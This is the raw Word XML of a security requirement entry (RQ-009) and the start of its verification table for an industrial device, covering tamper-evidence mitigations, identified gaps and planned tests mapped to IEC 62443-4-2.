    <w:p w14:paraId="05976719" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DB89A7" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1785C5C6" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2FFF23" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC62AC2" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397C5329" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DBB475" w14:textId="77777777" w:rsidR="006A564B" w:rsidRDefault="006A564B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EB81E7" w14:textId="77777777" w:rsidR="00F642E5" w:rsidRDefault="00F642E5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD04432" w14:textId="083F7EAE" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD509E7"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1FE8A1AE" w14:textId="4A192CEA" w:rsidR="00686AD1" w:rsidRPr="00686AD1" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-009</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F518D" w14:textId="4B79BA7A" w:rsidR="00686AD1" w:rsidRPr="00686AD1" w:rsidRDefault="00686AD1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO Requirement Text: </w:t>
      </w:r>
      <w:r w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall collect evidence of any modification of the installed software or its configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273850B0" w14:textId="3959ABED" w:rsidR="00686AD1" w:rsidRPr="00686AD1" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8,</w:t>
      </w:r>
      <w:r w:rsidR="00623DA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.9, CR 2.10, CR 2.11,</w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.12, </w:t>
      </w:r>
      <w:r w:rsidR="003D652C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.4</w:t>
      </w:r>
      <w:r w:rsidR="003D652C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Addition,) CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C27D6" w14:textId="5B903F68" w:rsidR="00686AD1" w:rsidRPr="00686AD1" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">B (Config); D (Firmware); </w:t>
      </w:r>
      <w:r w:rsidR="00B60D82">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F (Do</w:t>
      </w:r>
      <w:r w:rsidR="008C1503">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main separation)</w:t>
      </w:r>
      <w:r w:rsidR="003B5890">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003B5890" w:rsidRPr="003B5890">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B5890" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I (Audit Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411038C" w14:textId="2CECD472" w:rsidR="00686AD1" w:rsidRPr="00686AD1" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1503">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering,) </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752142B4" w14:textId="77777777" w:rsidR="008D6120" w:rsidRPr="00FB7743" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3EEB2" w14:textId="3427F7A1" w:rsidR="00FB7743" w:rsidRPr="00FB7743" w:rsidRDefault="00FB7743" w:rsidP="00FB7743">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REVISION_COUNTER (I&amp;M0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Increments on parameter change (SRIO-3002).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02090D4B" w14:textId="71318049" w:rsidR="00FB7743" w:rsidRPr="00FB7743" w:rsidRDefault="00FB7743" w:rsidP="00FB7743">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iParCRC/F_ParCRC change + I&amp;M4 signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modification is fingerprinted (SRIO-3011).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F9591" w14:textId="4E80C95C" w:rsidR="00FB7743" w:rsidRPr="00FB7743" w:rsidRDefault="00FB7743" w:rsidP="00FB7743">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Acyclic config write blocked after param-end (SRIO-7749)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> temporal write gate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBAE0C" w14:textId="6B5140AF" w:rsidR="00FB7743" w:rsidRPr="008D6120" w:rsidRDefault="00FB7743" w:rsidP="00FB7743">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FW/HW compatibility check + error-log entry; /firmware/version delta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7743">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version modification observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7EDC4" w14:textId="1B61E5E9" w:rsidR="0007458C" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
      <w:r w:rsidR="00686AD1" w:rsidRPr="00686AD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA3ED1" w14:textId="42492D8A" w:rsidR="0033455C" w:rsidRPr="0033455C" w:rsidRDefault="0033455C" w:rsidP="0033455C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configuration is authored in the engineering tool, stored on the (password-protected) PLC and pushed via fieldbus (SRIO-1983; System-Architecture §3.2). The actor is knowable, but only at the PLC/engineering-tool layer</w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, not device-resident </w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> device-level CR 2.12 is architecturally delegated for this QM slave.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108D91B" w14:textId="5A79BFF0" w:rsidR="0033455C" w:rsidRPr="0033455C" w:rsidRDefault="0033455C" w:rsidP="0033455C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">No RTC; uptime resets on cold start </w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifications not datable. REVISION_COUNTER carries a count but no timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72BD47" w14:textId="77777777" w:rsidR="008B20F6" w:rsidRDefault="0033455C" w:rsidP="0033455C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3 (asymmetric persistence)</w:t>
      </w:r>
      <w:r w:rsidR="00696A50">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The claim is that REVISION_COUNTER (I&amp;M0) survives cold start (durable count) while the Error-Log detail is cleared on cold start (volatile). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378757E0" w14:textId="77777777" w:rsidR="004C0D95" w:rsidRPr="004C0D95" w:rsidRDefault="008B20F6" w:rsidP="004C0D95">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0D95">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="0033455C" w:rsidRPr="004C0D95">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">persistence of REVISION_COUNTER across cold start is NOT explicitly documented (unlike the log-clear at SRIO-6521). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506FD2F" w14:textId="19BFE75B" w:rsidR="0025293B" w:rsidRDefault="0033455C" w:rsidP="004C0D95">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-4</w:t>
      </w:r>
      <w:r w:rsidR="00117576">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> REVISION_COUNTER wraps at 0xFFFF over the 20-year mission (SRIO-706) with frequent re-parameterisation </w:t>
      </w:r>
      <w:r w:rsidR="00942F11" w:rsidRPr="00942F11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0033455C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bounded evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B029FA2" w14:textId="77777777" w:rsidR="00942F11" w:rsidRDefault="00942F11" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3855EFDB" w14:textId="09A8C7B8"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p w14:paraId="53DF7328"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5"/>
        <w:gridCol w:w="3635"/>
        <w:gridCol w:w="1793"/>
        <w:gridCol w:w="2618"/>
        <w:gridCol w:w="867"/>
      </w:tblGrid>
      <w:tr w:rsidR="00900880" w14:paraId="6477ED7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563AEDE" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C385AEE"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490545F6"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6A59BE9D"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0FF27B7C"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7F5798" w14:paraId="68687F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7DE72AE" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BE265BC" w14:textId="4E33C9F3" w:rsidR="00900880" w:rsidRPr="007E1F53" w:rsidRDefault="00C3032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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enumerate the config-modification evidence surface (REVISION_COUNTER, iParCRC/I&amp;M4, Error Log) at baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1765C60D" w14:textId="63D9CC75" w:rsidR="00900880" w:rsidRPr="007E1F53" w:rsidRDefault="004332B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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional baseline (CR 6.1 met; CR 2.8 partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76C090ED" w14:textId="77777777" w:rsidR="007E1F53" w:rsidRPr="007E1F53" w:rsidRDefault="00E76A3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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirements-based verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366B91A7" w14:textId="5A9DE755" w:rsidR="00900880" w:rsidRPr="006643DB" w:rsidRDefault="00E76A30"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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57BF7E98" w14:textId="7C106F48" w:rsidR="00900880" w:rsidRPr="007E1F53"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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV</w:t>
            </w:r>
            <w:r w:rsidR="007E1F53" w:rsidRPr="007E1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="007E1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D258C9" w14:paraId="63227B5F"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BF551B5" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4C36CA" w14:textId="1F0F3113" w:rsidR="00900880" w:rsidRPr="00020E38" w:rsidRDefault="00020E3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20E38">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Change one iPar; capture REVISION_COUNTER/I&amp;M4 delta; cold-start and re-read</w:t>
            </w:r>
            <w:r w:rsidRPr="00020E38">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="00020E38">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>check for time/actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDEB966" w14:textId="2A8C053D" w:rsidR="009802A5" w:rsidRPr="007E1F53" w:rsidRDefault="007E50D2" w:rsidP="009802A5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E50D2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2 and</w:t>
            </w:r>
            <w:r>
